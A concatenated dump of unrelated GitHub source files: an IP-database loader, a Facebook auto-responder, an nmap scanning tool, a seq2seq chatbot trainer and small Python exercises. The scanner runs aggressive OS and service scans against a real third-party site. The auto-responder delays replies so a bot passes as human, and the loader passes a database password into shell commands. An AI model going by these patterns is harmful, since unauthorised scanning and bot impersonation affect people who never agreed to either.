if college_filename == None:
college_filename = os.path.abspath(tmp_dir+os.path.sep+"college.json")
if correct_filename == None:
correct_filename = os.path.abspath(data_dir+os.path.sep+"correct.json")
file_set(correct_filename)
convert(mysql_object,college_tablename,num_config,start_id,college_filename,correct_filename)
def sqldump(mysql_object):
print( "连接IP数据库, 并导出为sql文件: \n---------------处理中, 请稍候---------------")
sql_file = os.path.abspath(data_dir+os.path.sep+"ipdatabase.sql")
os.system('mysqldump -h %s -P %s -u %s -p%s %s > %s' % (config['mysql'].host, config['mysql'].port, config['mysql'].user, config['mysql'].password, config['mysql'].ip_database, sql_file))
print( "IP数据库导出成功! ")
table_college_info_sql_file = os.path.abspath(data_dir+os.path.sep+"college_info.sql")
table_iprange_info_sql_file = os.path.abspath(data_dir+os.path.sep+"iprange_info.sql")
os.system('mysqldump -h %s -P %s -u %s -p%s %s college_info > %s' % (config['mysql'].host, config['mysql'].port, config['mysql'].user, config['mysql'].password, config['mysql'].ip_database, table_college_info_sql_file))
print( "高校信息表导出成功! ")
os.system('mysqldump -h %s -P %s -u %s -p%s %s iprange_info > %s' % (config['mysql'].host, config['mysql'].port, config['mysql'].user, config['mysql'].password, config['mysql'].ip_database, table_iprange_info_sql_file))
print( "IP数据表导出成功! ")
if __name__ == '__main__':
"""
@description :实现纯真IP数据库的下载和更新.
---------
@params :None
-------
@Returns :None
-------
"""
filename = os.path.abspath(data_dir+os.path.sep+"czipdata.dat")
if os.path.exists(filename):
txt_filename = os.path.abspath(data_dir+os.path.sep+"czipdata.txt")
if os.path.exists(txt_filename):
dat2Txt(txt_filename= txt_filename)
#pass
mysql = mysql_Database(config['mysql'].ip_database)
dat2Mysql(mysql)
convertipv4(mysql)
sqldump(mysql) | [
"56478790+a76yyyy@users.noreply.github.com"
] | 56478790+a76yyyy@users.noreply.github.com |
36ab76b0fa7fe370c21c2b648632c72e9f5e83b4 | 137c12d79502122cb3206571bcf92e9754fd3cc9 | /responder.py | b3ca16897f31ea3b5ff04a57419fde83e1ccf5e1 | [] | no_license | BartusZdebski/fb-autoresponder | 4f43656427c9b6641e4d7321bb711a960980f664 | e1829b05beb3551e82b75ccbfa38a6e8994a93fc | refs/heads/master | 2020-07-18T11:59:29.953217 | 2019-09-04T06:28:52 | 2019-09-04T06:28:52 | 206,241,796 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,890 | py | import secrets
import threading
import time
import re
import random
import json
from fbchat import log, Client, Message
with open('contacts.json', 'r', encoding='utf-8') as file:
contacts = json.load(file)
log.info("Loaded contacts:")
for contact in contacts["contacts"]:
log.info("* " + contact)
log.info("")
with open('replies.json', 'r', encoding='utf-8') as file:
replies = json.load(file)
log.info("Loaded replies:")
for reply in replies["replies"]:
log.info("* " + reply)
log.info("")
log.info("")
log.info("")
class Bot(Client):
#Listen for the event
def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):
#Mark the newest received messagfe as delivered and as read
self.markAsDelivered(thread_id, message_object.uid)
#Fetch sender name to check for whitelist
sender_name = client.fetchUserInfo(author_id)[author_id].name
log.info("Received message from" + sender_name + ", text: " + message_object.text)
def sendReply():
#Handle replying
log.info("Sending message to " + sender_name + ", text:" + reply)
#Send the message
self.send(Message(text=reply), thread_id=thread_id, thread_type=thread_type)
#Check whether the sender is on whitelist
for contact in contacts["contacts"]:
if contact in sender_name:
#Select random reply...
reply = secrets.choice(replies['replies'])
#Handle interactive replies
if "{}" in reply:
reply = reply.format(sender_name.split()[0])
#Generate a random delay to make it more humanlike?
delayTime = float(random.randrange(5,25,1))
#Mark it as read...
self.markAsRead(thread_id)
#Make a thread so it doesn't clog up the main thread
threading.Timer(delayTime, sendReply).start()
#Log in and listen
client = Bot("login@mail.com", "password")
client.listen() | [
"noreply@github.com"
] | BartusZdebski.noreply@github.com |
a23776a69c1c30f0a065d46cab1f8ca2e0904e26 | 741191d21d1248b0501ca4fcba7c548998e82b3c | /spidermanage/spidertool/sniffertool.py | 3267591c39100a33d9c29eef25f06e2c5b462eba | [] | no_license | CryptoConsultants/toolforspider | 27fd2df948846c2a40908f3f3deea1422bea4410 | eb1c3a362c360852be734d8f296512e02bf3b045 | refs/heads/master | 2021-01-17T07:28:11.671526 | 2016-02-19T09:06:15 | 2016-02-19T09:06:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,427 | py | #!/usr/bin/python
#coding:utf-8
'''
Created on 2015年10月29日
@author: sherwel
'''
import sys
import nmap
import os
import time
import SQLTool
import Sqldatatask
import config
import Sqldata
from numpy.numarray.numerictypes import IsType
import connectpool
import portscantask
import getLocationTool
reload(sys) # Python2.5 初始化后会删除 sys.setdefaultencoding 这个方法,我们需要重新载入
class SniffrtTool(object):
    '''
    Wrapper around python-nmap's PortScanner (Python 2 code).

    Runs nmap scans against hosts, parses the OS / TCP / UDP port results
    and hands the parsed rows off to the SQL, geolocation and port-scan
    worker queues for asynchronous processing.
    '''
    def __init__(self):
        '''
        Build the nmap scanner and grab the shared config / worker-queue helpers.
        '''
        try:
            self.nma = nmap.PortScanner() # instantiate nmap.PortScanner object
            self.params='-A -Pn -sC -R -v -O '
            # Alternative presets kept for reference:
            # self.params='-sV -T4 -O '        # quick scan, enhanced
            # self.params='-sS -sU -T4 -A -v'  # deep scan
        except nmap.PortScannerError:
            print('Nmap not found', sys.exc_info()[0])
        except:
            print('Unexpected error:', sys.exc_info()[0])
        # NOTE(review): if PortScanner() raised above, self.nma was never
        # assigned and later scan calls will fail with AttributeError.
        self.config=config.Config
        self.sqlTool=Sqldatatask.getObject()
#         self.sqlTool=SQLTool.getObject()
        self.portscan=portscantask.getObject()
        self.getlocationtool=getLocationTool.getObject()
    def scaninfo(self,hosts='localhost', port='', arguments='',hignpersmission='0',callback=''):
        # Run one nmap scan and feed the raw result dict to `callback`
        # (defaults to self.callback_result).  hignpersmission (sic) == '0'
        # prepends the default self.params to `arguments`; any other value
        # passes `arguments` through unchanged.  Returns the callback's
        # result, or '' on scan failure.
        if callback=='':
            callback=self.callback_result
        orders=''
        if port!='':
            orders+=port
        else :
            orders=None
        try:
            if hignpersmission=='0':
                print '我在这里49'
                print hosts,orders,self.params+arguments
                acsn_result=self.nma.scan(hosts=hosts,ports= orders,arguments=self.params+arguments)
                #acsn_result=self.nma.scan(hosts=hosts,ports= orders,arguments=arguments)
                print acsn_result
                print '我在这里51'
                return callback(acsn_result)
            else:
                print '我在这里52'
                return callback(self.nma.scan(hosts=hosts,ports= orders,arguments=arguments,callback=callback) )
        except nmap.PortScannerError,e:
            print e
            print '我在这里57'
            return ''
        except:
            print('Unexpected error:', sys.exc_info()[0])
            print '我在这里62'
            return ''
    def callback_result(self,scan_result):
        # Parse an nmap scan-result dict: for each host, queue an IP/OS row
        # plus one row per open TCP/UDP port, and always return the raw
        # result as a string.
        print '——————'
        tmp=scan_result
        for i in tmp['scan'].keys():
            host=i
            result=''
            try:
#                 result = u"ip地址:%s 主机名:%s ...... %s\n" %(host,tmp['scan'][host].get('hostnames','null'),tmp['scan'][host]['status'].get('state','null'))
#                 self.sqlTool.connectdb()
#                 print tmp['scan'][host].get('hostname','null')
                temphosts=str(host)
                localtime=str(time.strftime("%Y-%m-%d %X", time.localtime()))
                # Queue a reverse-geolocation lookup for this IP.
                self.getlocationtool.add_work([temphosts])
                try :
                    # OS fingerprint: take the first osmatch/osclass entry.
                    tempvendor=str(tmp['scan'][host]['osmatch'][0]['osclass'][0].get('vendor','null'))
                    temposfamily=str(tmp['scan'][host]['osmatch'][0]['osclass'][0].get('osfamily','null'))
                    temposgen=str(tmp['scan'][host]['osmatch'][0]['osclass'][0].get('osgen','null'))
                    tempaccuracy=str(tmp['scan'][host]['osmatch'][0]['osclass'][0].get('accuracy','null'))
                    temphostname=''
                    # NOTE(review): this loop variable `i` shadows the outer
                    # host-loop variable `i`.
                    for i in tmp['scan'][host]['hostnames']:
                        temphostname+=str(i.get('name','null'))+' '
                    tempstate=str(tmp['scan'][host]['status'].get('state','null'))
                    # Queue an upsert into the IP table.
                    sqldatawprk=[]
                    dic={"table":self.config.iptable,"select_params": ['ip','vendor','osfamily','osgen','accurate','updatetime','hostname','state'],"insert_values": [(temphosts,tempvendor,temposfamily,temposgen,tempaccuracy,localtime,temphostname,tempstate)]}
                    tempwprk=Sqldata.SqlData('replaceinserttableinfo_byparams',dic)
                    sqldatawprk.append(tempwprk)
                    self.sqlTool.add_work(sqldatawprk)
                except Exception,e:
                    print 'nmap system error'+str(e)
                if 'tcp' in tmp['scan'][host].keys():
                    ports = tmp['scan'][host]['tcp'].keys()
                    for port in ports:
                        # Queue one port-table row per TCP port, plus a
                        # follow-up job for the per-service port scanner.
                        tempport=str(port)
                        tempportname=str(tmp['scan'][host]['tcp'][port].get('name',''))
                        tempportstate=str(tmp['scan'][host]['tcp'][port].get('state',''))
                        tempproduct=str(tmp['scan'][host]['tcp'][port].get('product',''))
                        tempportversion=str(tmp['scan'][host]['tcp'][port].get('version',''))
                        tempscript=str(tmp['scan'][host]['tcp'][port].get('script',''))
                        sqldatawprk=[]
                        dic={"table":self.config.porttable,"select_params": ['ip','port','timesearch','state','name','product','version','script'],"insert_values": [(temphosts,tempport,localtime,tempportstate,tempportname,tempproduct,tempportversion,tempscript)]}
                        tempwprk=Sqldata.SqlData('replaceinserttableinfo_byparams',dic)
                        sqldatawprk.append(tempwprk)
                        self.sqlTool.add_work(sqldatawprk)
                        self.portscan.add_work([(tempportname,temphosts,tempport,tempportstate)])
                elif 'udp' in tmp['scan'][host].keys():
                    ports = tmp['scan'][host]['udp'].keys()
                    for port in ports:
                        # Same as the TCP branch but without the follow-up
                        # port-scan job.
                        tempport=str(port)
                        tempportname=str(tmp['scan'][host]['udp'][port].get('name',''))
                        tempportstate=str(tmp['scan'][host]['udp'][port].get('state',''))
                        tempproduct=str(tmp['scan'][host]['udp'][port].get('product',''))
                        tempportversion=str(tmp['scan'][host]['udp'][port].get('version',''))
                        tempscript=str(tmp['scan'][host]['udp'][port].get('script',''))
                        sqldatawprk=[]
                        dic={"table":self.config.porttable,"select_params": ['ip','port','timesearch','state','name','product','version','script'],"insert_values": [(temphosts,tempport,localtime,tempportstate,tempportname,tempproduct,tempportversion,tempscript)]}
                        tempwprk=Sqldata.SqlData('replaceinserttableinfo_byparams',dic)
                        sqldatawprk.append(tempwprk)
                        self.sqlTool.add_work(sqldatawprk)
            except Exception,e:
                print 'nmap error'+str(e)
            # NOTE(review): the two clauses below are unreachable — IOError
            # and KeyError are subclasses of Exception, which is caught above.
            except IOError,e:
                print '错误IOError'+str(e)
            except KeyError,e:
                print '不存在该信息'+str(e)
            finally:
                # NOTE(review): `return` inside `finally` inside the host
                # loop exits after the FIRST host; remaining hosts are never
                # processed, and it also swallows any in-flight exception.
                return str(scan_result)
    def scanaddress(self,hosts=[], ports=[],arguments=''):
        # Scan each host (pairing it with ports[i] when available) and
        # concatenate the non-None callback results.
        # NOTE(review): mutable default arguments ([]) are shared between
        # calls — harmless while they are never mutated, but fragile.
        temp=''
        for i in range(len(hosts)):
            if len(ports)<=i:
                result=self.scaninfo(hosts=hosts[i],arguments=arguments)
                if result is None:
                    pass
                else:
                    temp+=result
            else:
                result=self.scaninfo(hosts=hosts[i], port=ports[i],arguments=arguments)
                if result is None:
                    pass
                else:
                    temp+=result
        return temp
    def isrunning(self):
        # NOTE(review): self.host is never assigned anywhere in this class,
        # so this raises AttributeError as written — confirm intended usage.
        return self.nma.has_host(self.host)
def callback_resultl(host, scan_result):
    # Legacy module-level callback that only formats/prints one host's scan
    # result (the banner string itself says it is never triggered).
    # Kept for reference; SniffrtTool.callback_result supersedes it.
    print '———不触发这个函数———'
    tmp=scan_result
    result=''
    try:
        # Header line: IP, hostname and host state.
        result = u"ip地址:%s 主机名:%s ...... %s\n" %(host,tmp['scan'][host]['hostname'],tmp['scan'][host]['status']['state'])
        if 'osclass' in tmp['scan'][host].keys():
            # OS fingerprint summary with accuracy.
            result +=u"系统信息 : %s %s %s 准确度:%s \n" % (str(tmp['scan'][host]['osclass']['vendor']),str(tmp['scan'][host]['osclass']['osfamily']),str(tmp['scan'][host]['osclass']['osgen']),str(tmp['scan'][host]['osclass']['accuracy']))
        if 'tcp' in tmp['scan'][host].keys():
            ports = tmp['scan'][host]['tcp'].keys()
            for port in ports:
                portinfo = " port : %s name:%s state : %s product : %s version :%s script:%s \n" %(port,tmp['scan'][host]['tcp'][port]['name'],tmp['scan'][host]['tcp'][port]['state'], tmp['scan'][host]['tcp'][port]['product'],tmp['scan'][host]['tcp'][port]['version'],tmp['scan'][host]['tcp'][port]['script'])
                print portinfo
                result+= portinfo
        elif 'udp' in tmp['scan'][host].keys():
            ports = tmp['scan'][host]['udp'].keys()
            for port in ports:
                portinfo = " port : %s name:%s state : %s product : %s version :%s script:%s \n" %(port,tmp['scan'][host]['udp'][port]['name'],tmp['scan'][host]['udp'][port]['state'], tmp['scan'][host]['udp'][port]['product'],tmp['scan'][host]['udp'][port]['version'],tmp['scan'][host]['udp'][port]['script'])
                result += portinfo
    except Exception,e:
        print e
    # NOTE(review): unreachable — IOError/KeyError are subclasses of
    # Exception, caught above.
    except IOError,e:
        print '错误IOError'+str(e)
    except KeyError,e:
        print '不存在该信息'+str(e)
    finally:
        return result
"""
def callback_resultl(host, scan_result):
print scan_result
print scan_result['scan']
f = open('abc.xml','w+')
f.write(str(scan_result))
f.close()
"""
order=' -P0 -sV -sC -sU -O -v -R -sT '
orderq='-A -P0 -Pn -sC -p '
if __name__ == "__main__":
temp=SniffrtTool()
# hosts=['www.cctv.com','localhost','www.baidu.com']'www.cctv.com' www.vip.com
hosts=['www.cctv.com']
temp.scanaddress(hosts,ports=['80'],arguments='')
# print time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
| [
"nanshihui@qq.com"
] | nanshihui@qq.com |
a1e6b00361eac98b2587ff68b2e064c6d9e759ef | 0fb2101a65af3984f449e754957a7af54a4d0e14 | /src/constants/__init__.py | ff752e818051e514be55f79707d409038d803edc | [] | no_license | lequang-hp/movie_suggest | 7c3145763a86c47ca1417adc6093ef27176b3839 | 02de6543d6aef3d46e80152ad5d382f29c7cc99d | refs/heads/master | 2023-03-20T07:33:54.961771 | 2021-02-22T03:53:14 | 2021-02-22T03:53:14 | 340,307,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 62 | py | from .common import Common
from .task_status import TaskStatus | [
"lequang0810@gmail.com"
] | lequang0810@gmail.com |
d1fb8c206ccf7bfad15ca6ea7a274a3c1351c83b | 3bc9ef617571cd95d76a745020bbfe29fe16e5b8 | /seq2seq-chatbot/run.py | f1cf79ada98c1391812c74a44ed51018a26508ca | [] | no_license | Tianyijian/pytorch-tutorial | 8af1696b84042c590c467821192ed45242d3ccdc | 4945f657ea7043e3e8475d484c62b40999e99eff | refs/heads/master | 2022-11-23T00:34:52.123273 | 2022-11-07T14:25:31 | 2022-11-07T14:25:31 | 228,196,035 | 1 | 0 | null | 2022-11-07T14:25:32 | 2019-12-15T14:18:11 | Python | UTF-8 | Python | false | false | 12,315 | py | import torch.optim as optim
from torch.utils.tensorboard import SummaryWriter
from data import *
from model import *
import argparse
# NOTE(review): torch/nn/os/random are not imported directly here —
# presumably supplied by the star imports from data/model above; confirm.
device = torch.device("cuda:8" if torch.cuda.is_available() else "cpu")
writer = SummaryWriter("logs")  # TensorBoard loss logging
# Model configuration
model_name = 'cb_model'
attn_model = 'dot'  # Luong attention score function
# attn_model = 'general'
# attn_model = 'concat'
hidden_size = 500
encoder_n_layers = 2
decoder_n_layers = 2
dropout = 0.1
batch_size = 256
# Training / optimization configuration
clip = 50.0                    # gradient-clipping max norm
teacher_forcing_ratio = 1.0    # probability of teacher forcing per iteration
learning_rate = 0.0001
decoder_learning_ratio = 5.0   # decoder LR = learning_rate * this
n_iteration = 4000
print_every = 1
save_every = 1000              # checkpoint interval (iterations)
def maskNLLLoss(inp, target, mask):
    """Masked negative log-likelihood over one decoder time step.

    inp holds per-row probability distributions, target the gold indexes
    (one per row) and mask the boolean padding mask.  Returns the mean
    -log p(target) over unmasked rows (moved to `device`) together with
    the number of unmasked tokens as a plain Python int.
    """
    n_valid = mask.sum()
    # Pick out each row's probability of its gold token.
    picked = torch.gather(inp, 1, target.view(-1, 1)).squeeze(1)
    neg_log_lik = -torch.log(picked)
    # Average only over non-padding positions.
    masked_mean = neg_log_lik.masked_select(mask).mean()
    return masked_mean.to(device), n_valid.item()
def train(input_variable, lengths, target_variable, mask, max_target_len, encoder, decoder, embedding,
          encoder_optimizer, decoder_optimizer, batch_size, clip, teacher_forcing_ratio, max_length=MAX_LENGTH):
    """Run one training iteration over a single batch.

    Forward the batch through the seq2seq model (optionally with teacher
    forcing), backprop the masked NLL loss, clip gradients and step both
    optimizers.  Returns the average per-token loss for the batch.
    """
    # Zero the gradients.
    encoder_optimizer.zero_grad()
    decoder_optimizer.zero_grad()
    # Move the batch tensors to the configured device.
    input_variable = input_variable.to(device)
    lengths = lengths.to(device)
    target_variable = target_variable.to(device)
    mask = mask.to(device)
    # Initialize accumulators.
    loss = 0
    print_losses = []
    n_totals = 0
    # Encoder forward pass.
    encoder_outputs, encoder_hidden = encoder(input_variable, lengths)
    # Initial decoder input: an SOS token for every sentence in the batch.
    decoder_input = torch.LongTensor([[SOS_token for _ in range(batch_size)]])
    decoder_input = decoder_input.to(device)
    # Seed the decoder hidden state with the encoder's final hidden state.
    decoder_hidden = encoder_hidden[:decoder.n_layers]
    # Decide whether this iteration uses teacher forcing.
    use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False
    # Step the decoder one time step at a time over the whole batch.
    if use_teacher_forcing:
        for t in range(max_target_len):
            decoder_output, decoder_hidden = decoder(
                decoder_input, decoder_hidden, encoder_outputs
            )
            # Teacher forcing: the next input is the current target token.
            decoder_input = target_variable[t].view(1, -1)
            # Compute and accumulate the masked loss for this step.
            mask_loss, nTotal = maskNLLLoss(decoder_output, target_variable[t], mask[t])
            loss += mask_loss
            print_losses.append(mask_loss.item() * nTotal)
            n_totals += nTotal
    else:
        for t in range(max_target_len):
            decoder_output, decoder_hidden = decoder(
                decoder_input, decoder_hidden, encoder_outputs
            )
            # No teacher forcing: feed back the decoder's own top prediction.
            _, topi = decoder_output.topk(1)
            decoder_input = torch.LongTensor([[topi[i][0] for i in range(batch_size)]])
            decoder_input = decoder_input.to(device)
            # Compute and accumulate the masked loss for this step.
            mask_loss, nTotal = maskNLLLoss(decoder_output, target_variable[t], mask[t])
            loss += mask_loss
            print_losses.append(mask_loss.item() * nTotal)
            n_totals += nTotal
    # Backpropagate.
    loss.backward()
    # Clip gradients (modified in place).
    _ = torch.nn.utils.clip_grad_norm_(encoder.parameters(), clip)
    _ = torch.nn.utils.clip_grad_norm_(decoder.parameters(), clip)
    # Update the model weights.
    encoder_optimizer.step()
    decoder_optimizer.step()
    return sum(print_losses) / n_totals
def trainIters(model_name, voc, pairs, encoder, decoder, encoder_optimizer, decoder_optimizer, embedding,
               encoder_n_layers, decoder_n_layers, save_dir, n_iteration, batch_size, print_every, save_every, clip,
               corpus_name, loadFilename, teacher_forcing_ratio, hidden_size):
    """Run the full training loop: sample batches, train, log and checkpoint.

    Logs the running average loss to TensorBoard every `print_every`
    iterations and saves a full checkpoint (models, optimizers, vocab,
    embedding) every `save_every` iterations under save_dir.
    """
    # Pre-build one randomly-sampled batch per iteration.
    training_batches = [batch2TrainData(voc, [random.choice(pairs) for _ in range(batch_size)])
                        for _ in range(n_iteration)]
    # Initialization.
    print('Initializing ...')
    start_iteration = 1
    print_loss = 0
    # if loadFilename:
    #     start_iteration = checkpoint['iteration'] + 1
    # Training loop.
    print("Training...")
    for iteration in range(start_iteration, n_iteration + 1):
        training_batch = training_batches[iteration - 1]
        # Unpack the batch fields.
        input_variable, lengths, target_variable, mask, max_target_len = training_batch
        # Run one training iteration on this batch.
        loss = train(input_variable, lengths, target_variable, mask, max_target_len, encoder,
                     decoder, embedding, encoder_optimizer, decoder_optimizer, batch_size, clip, teacher_forcing_ratio)
        print_loss += loss
        # Print / log progress.
        if iteration % print_every == 0:
            print_loss_avg = print_loss / print_every
            print("Iteration: {}; Percent complete: {:.1f}%; Average loss: {:.4f}".format(iteration,
                                                                                          iteration / n_iteration * 100,
                                                                                          print_loss_avg))
            writer.add_scalar("loss", print_loss_avg, iteration)
            print_loss = 0
        # Save a checkpoint.
        if (iteration % save_every == 0):
            directory = os.path.join(save_dir,
                                     '{}-{}_{}'.format(encoder_n_layers, decoder_n_layers, hidden_size))
            if not os.path.exists(directory):
                os.makedirs(directory)
            torch.save({
                'iteration': iteration,
                'en': encoder.state_dict(),
                'de': decoder.state_dict(),
                'en_opt': encoder_optimizer.state_dict(),
                'de_opt': decoder_optimizer.state_dict(),
                'loss': loss,
                'voc_dict': voc.__dict__,
                'embedding': embedding.state_dict()
            }, os.path.join(directory, '{}_{}.tar'.format(iteration, 'checkpoint')))
    writer.close()
def evaluate(searcher, voc, sentence, max_length=MAX_LENGTH):
    """Decode one normalized input sentence and return the predicted words."""
    # Encode the sentence as a single-example batch of word indexes.
    idx_seq = indexesFromSentence(voc, sentence)
    seq_lengths = torch.tensor([len(idx_seq)]).to(device)
    # Shape (seq_len, 1): the models expect time-major batches.
    batch = torch.LongTensor([idx_seq]).transpose(0, 1).to(device)
    # Let the searcher (e.g. greedy decoder) produce token ids and scores.
    tokens, scores = searcher(batch, seq_lengths, max_length)
    # Map every predicted index back to its vocabulary word.
    return [voc.index2word[tok.item()] for tok in tokens]
def evaluateInput(searcher, voc):
    """Interactive chat loop: read sentences from stdin until 'q'/'quit'."""
    input_sentence = ''
    while (1):
        try:
            # Read the next input sentence.
            input_sentence = input('> ')
            # Check for the quit command.
            if input_sentence == 'q' or input_sentence == 'quit': break
            # Normalize the sentence (lowercase, strip punctuation, ...).
            input_sentence = normalizeString(input_sentence)
            # Decode a reply.
            output_words = evaluate(searcher, voc, input_sentence)
            # Keep words up to the first EOS/PAD token, then print the reply.
            output = []
            for x in output_words:
                if not (x == 'EOS' or x == 'PAD'):
                    output.append(x)
                else:
                    break
            print('Bot:', ' '.join(output))
        except KeyError:
            # Raised when the sentence contains a word outside the vocabulary.
            print("Error: Encountered unknown word.")
def run():
    """Train the chatbot model from scratch (or a checkpoint) and save it."""
    voc, pairs = loadPrepareData(corpus, corpus_name, datafile, save_dir)
    pairs = trimRareWords(voc, pairs, MIN_COUNT)
    # Checkpoint to resume from; None means train from scratch.
    loadFilename = None
    checkpoint_iter = 4000
    # loadFilename = os.path.join(save_dir, model_name, corpus_name,
    #                            '{}-{}_{}'.format(encoder_n_layers, decoder_n_layers, hidden_size),
    #                            '{}_checkpoint.tar'.format(checkpoint_iter))
    # If a checkpoint path was provided, load all saved state from it.
    if loadFilename:
        # Loading on the same machine the model was trained on.
        checkpoint = torch.load(loadFilename)
        # If loading a model trained on GPU to CPU
        # checkpoint = torch.load(loadFilename, map_location=torch.device('cpu'))
        encoder_sd = checkpoint['en']
        decoder_sd = checkpoint['de']
        encoder_optimizer_sd = checkpoint['en_opt']
        decoder_optimizer_sd = checkpoint['de_opt']
        embedding_sd = checkpoint['embedding']
        voc.__dict__ = checkpoint['voc_dict']
    print('Building encoder and decoder ...')
    # Initialize the word embeddings.
    embedding = nn.Embedding(voc.num_words, hidden_size)
    if loadFilename:
        embedding.load_state_dict(embedding_sd)
    # Initialize the encoder & decoder models.
    encoder = EncoderRNN(hidden_size, embedding, encoder_n_layers, dropout)
    decoder = LuongAttnDecoderRNN(attn_model, embedding, hidden_size, voc.num_words, decoder_n_layers, dropout)
    if loadFilename:
        encoder.load_state_dict(encoder_sd)
        decoder.load_state_dict(decoder_sd)
    # Move the models to the configured device.
    encoder = encoder.to(device)
    decoder = decoder.to(device)
    print('Models built and ready to go!')
    # Make sure dropout layers are in train mode.
    encoder.train()
    decoder.train()
    # Initialize the optimizers.
    print('Building optimizers ...')
    encoder_optimizer = optim.Adam(encoder.parameters(), lr=learning_rate)
    decoder_optimizer = optim.Adam(decoder.parameters(), lr=learning_rate * decoder_learning_ratio)
    if loadFilename:
        encoder_optimizer.load_state_dict(encoder_optimizer_sd)
        decoder_optimizer.load_state_dict(decoder_optimizer_sd)
    # Run the training iterations.
    print("Starting Training!")
    trainIters(model_name, voc, pairs, encoder, decoder, encoder_optimizer, decoder_optimizer,
               embedding, encoder_n_layers, decoder_n_layers, save_dir, n_iteration, batch_size,
               print_every, save_every, clip, corpus_name, loadFilename, teacher_forcing_ratio, hidden_size)
def test(loadFilename):
    """Load a saved checkpoint and chat with the model interactively."""
    voc = Voc(corpus_name)
    # Load the saved model state.
    # print("Load model: " + loadFilename)
    checkpoint = torch.load(loadFilename)
    # If loading a model trained on GPU to CPU
    # checkpoint = torch.load(loadFilename, map_location=torch.device('cpu'))
    encoder_sd = checkpoint['en']
    decoder_sd = checkpoint['de']
    # encoder_optimizer_sd = checkpoint['en_opt']
    # decoder_optimizer_sd = checkpoint['de_opt']
    embedding_sd = checkpoint['embedding']
    voc.__dict__ = checkpoint['voc_dict']
    # Initialize the word embeddings from the checkpoint.
    embedding = nn.Embedding(voc.num_words, hidden_size)
    embedding.load_state_dict(embedding_sd)
    # Initialize the encoder & decoder models and restore their weights.
    encoder = EncoderRNN(hidden_size, embedding, encoder_n_layers, dropout)
    decoder = LuongAttnDecoderRNN(attn_model, embedding, hidden_size, voc.num_words, decoder_n_layers, dropout)
    encoder.load_state_dict(encoder_sd)
    decoder.load_state_dict(decoder_sd)
    # Move the models to the configured device.
    encoder = encoder.to(device)
    decoder = decoder.to(device)
    print('Ready! Start Chatting!')
    # Put dropout layers in eval mode.
    encoder.eval()
    decoder.eval()
    # Initialize the decoding searcher.
    searcher = GreedySearchDecoder(encoder, decoder, device, SOS_token)
    # Start the interactive chat loop.
    evaluateInput(searcher, voc)
if __name__ == '__main__':
    # CLI: --mode train trains from scratch; --mode test chats with the
    # checkpoint given by --model_dir.
    parser = argparse.ArgumentParser(description="-----ChatBot-----")
    parser.add_argument("--mode", default="train", help="train: train the model / test: test saved models")
    parser.add_argument("--model_dir",
                        default="data/save/2-2_500/4000_checkpoint.tar",
                        help="saved model path")
    args = parser.parse_args()
    if args.mode == "train":
        run()
    elif args.mode == "test":
        test(args.model_dir)
| [
"2624132357@qq.com"
] | 2624132357@qq.com |
a161ce85ba6b60459f2657b8565d810f08bf63e7 | 8aee98818508a205bf34263e8673289718518670 | /test_server/pixnetproject/tripapp/models.py | fb2cc16bfd1827faecf7d7731f6fc64f2f4f046d | [] | no_license | dovanduy/pixnet_hackathon_2019 | 47fed1afa82326f09cffe8358d2d0bb5f6a8d721 | a9243223ca8a3f9464c2b37bb1732686b683f997 | refs/heads/master | 2023-02-23T09:43:05.692364 | 2020-04-07T10:42:54 | 2020-04-07T10:42:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | from django.db import models
# Create your models here.
class Result(models.Model):
    """Stores a single search term entered by a user."""
    # NOTE(review): field name is capitalized, unlike Django convention.
    Search = models.CharField(max_length=15)
    def __str__(self):
        return self.Search
"wilbert.phen@gmail.com"
] | wilbert.phen@gmail.com |
d518f64f0bbd5273253b9da996adb85350151238 | 730a0291d90bf220d162791287e422bc4225d164 | /samples/StackResult/fsmpy/StackSynchronized.py | ce716b3963340b6d02b4f30ab46f82112d7579f6 | [
"BSD-3-Clause"
] | permissive | jon-jacky/PyModel | 27442d062e615bd0bf1bd16d86ae56cc4d3dc443 | 457ea284ea20703885f8e57fa5c1891051be9b03 | refs/heads/master | 2022-11-02T14:08:47.012661 | 2022-10-16T09:47:53 | 2022-10-16T09:47:53 | 2,034,133 | 75 | 36 | NOASSERTION | 2021-07-11T21:15:08 | 2011-07-12T04:23:02 | Python | UTF-8 | Python | false | false | 1,026 | py |
# pma.py Stack StackOneScenario -m 6 -o StackSynchronized
# 4 states, 6 transitions, 4 accepting states, 0 unsafe states, 0 finished and 0 deadend states
# actions here are just labels, but must be symbols with __name__ attribute
# NOTE: this file is generated by pma.py (see header); regenerate rather
# than hand-editing.
# actions here are just labels, but must be symbols with __name__ attribute
def Push(): pass
def Pop(): pass
# states, key of each state here is its number in graph etc. below
states = {
  0 : {'StackOneScenario': 0, 'Stack': {'stack': []}},
  1 : {'StackOneScenario': 0, 'Stack': {'stack': [1]}},
  2 : {'StackOneScenario': 0, 'Stack': {'stack': [1, 1]}},
  3 : {'StackOneScenario': 0, 'Stack': {'stack': [1, 1, 1]}},
}
# initial state, accepting states, unsafe states, frontier states, deadend states
initial = 0
accepting = [0, 1, 2, 3]
unsafe = []
frontier = []
finished = []
deadend = []
runstarts = [0]
# finite state machine, list of tuples: (current, (action, args, result), next)
graph = (
  (0, (Push, (1,), None), 1),
  (1, (Pop, (), 1), 0),
  (1, (Push, (1,), None), 2),
  (2, (Pop, (), 1), 1),
  (2, (Push, (1,), None), 3),
  (3, (Pop, (), 1), 2),
)
| [
"jon@u.washington.edu"
] | jon@u.washington.edu |
a914ff8c2d0018797ec75f0eb379efac9c21abef | c0a5ff5f77943a9529512e6b27148f3318ab5264 | /vowels2.py | 9fe9e3f321664f0f5ebedae52821be5fdb7ac104 | [] | no_license | smatthewenglish/head_first_python | b15cc7260fa6607759778ac37d86006f803462a9 | 6e783ce541d5462fb2f84cc901c713fcf5895240 | refs/heads/master | 2023-03-28T14:50:16.857613 | 2021-03-31T16:41:14 | 2021-03-31T16:41:14 | 350,149,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | vowels = ['a', 'e', 'i', 'o', 'u']
#word = "Milliways"
word = input("Provide a word to search for vowels: ")
found = []
for letter in word:
if letter in vowels:
#print(letter)
if letter not in found:
found.append(letter)
for vowel in found:
